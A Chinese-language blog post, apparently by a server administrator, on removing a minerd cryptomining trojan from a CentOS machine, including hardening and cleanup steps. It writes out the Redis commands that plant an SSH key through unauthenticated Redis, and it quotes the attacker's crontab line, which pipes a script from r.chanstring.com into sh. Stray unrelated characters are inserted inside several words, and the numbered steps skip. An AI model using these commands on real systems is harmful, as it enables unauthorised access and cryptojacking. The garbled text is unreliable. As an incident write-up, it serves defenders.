彻底清除Linux centos minerd木马

由于用的是临时服务器，安全性上疏忽了，导致受到了minerd木马攻击，清理的时候，遇到了ntp这个很具有迷惑性的服务，费了一番功夫才敢彻底清理。

现状描述

1、top可以看到，这个minerd 程序把cpu跑满了

3、有可能是免密登录了，去/root/.ssh 目录下，并没有发现authorized_keys，但发现了KHK75NEOiq这个文件--查看 vim KHK75NEOiq可以看到内容就是免密码登录的公钥

5、那么是写进来authorized_key衡痕贤伎s的那？---之前我处理过类似的问题，是redis未授权导致的，也就是说外网可以直接不用密码登录菀蒯踔观我的redis, 连上redis后，通过以下命令即可创建文件：---config set dir /root/.sshconfig set dbfilename authorized_keysset key value，其中value为生成公钥，即可将公钥保存在服务器，使得登录时不需要输入账号与密码。

先堵住免登录漏洞

1、修改ssh端口编辑/etc/ssh/sshd_config文件中的Port 22将22修改为其他端口

2、禁止root用户登陆编辑/etc/ssh/sshd_config文件中的PermitRootLogin 修改为no

3、修改无密码登陆的文件路径编辑/etc/ssh/sshd_config文件中的AuthorizedKeysFile 修改为其他文件路径

4、删除 .ssh下的 KHK75NEOiq

5、不让外网直接连接在 redis.conf 文件中找到#bind 127.0.0.1，把前面的#号去掉，重启

找到木马守护进程

1、通常直接kill掉进程，是不好使的，肯定有守护进程，还有系统自启动，所以清理步骤是这样的：1：干掉守护进程2：干掉系统自启动3：干掉木马进程---找到木马守护进程并干掉---守护进程有大概有两种存在形式，crontab 和常驻进程，常驻进程得慢慢分析，我们先看crontab，有一条不是我创建的任务。任务是：直接从远程下载一个脚本pm.sh 并执行。

3、大致逻辑是这样的：1）把*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh 写入cro荏鱿胫协ntab2）把authorized_keys删掉，并创建免登录文件/root/.ssh/KHK75NEOiq，修改ssh配置重启3）curl下载/opt/KHK75NEOiq33 这个文件，并执行安装（/opt/KHK75NEOiq33 --Install），然后启动ntp

4、基本可以断定这个ntp就是守护进程，但看到ntp真的有些怕怕，ntp不是搞时间同步的吗，其实 Linux正常的ntp服务叫ntpd，并非ntp，很有迷惑性啊

6、Jul 24 09:23:01 第一次执行： curl -Lhttp://r.chanstring.com/pm.sh?0703---Jul 24 09:30:01 第一次我们目前crontab里的任务：curl -fsSLhttp://r.chanstring.com/pm.sh?0706---Jul 24 09:49脚本/etc/init.d/ntp的创建时间---从pm.sh这个脚本可知curl下来/opt/KHK75NEOiq33这个文件，并执行安装/opt/KHK75NEOiq33 --Install 比较耗时间，我执行了一下，在我的机器上是10多分钟。--所以创建时间上基本吻合

8、看一下常用的3吧可以看到 有个S50ntp 软链了脚本/etc/init.d/ntp

10、我们来看一下/etc/init.d/ntp 这个脚本$name应该就对应的值是 S50ntp，通过stdout_log,stderr_log,pid_file也得到了验证。

12、打开 /usr/local/etc/minerd.conf，内容就是/opt/minerd这个进程后的一些参数

4、干掉安装文件及免密登录的文件

6、top一下 一切都正常了！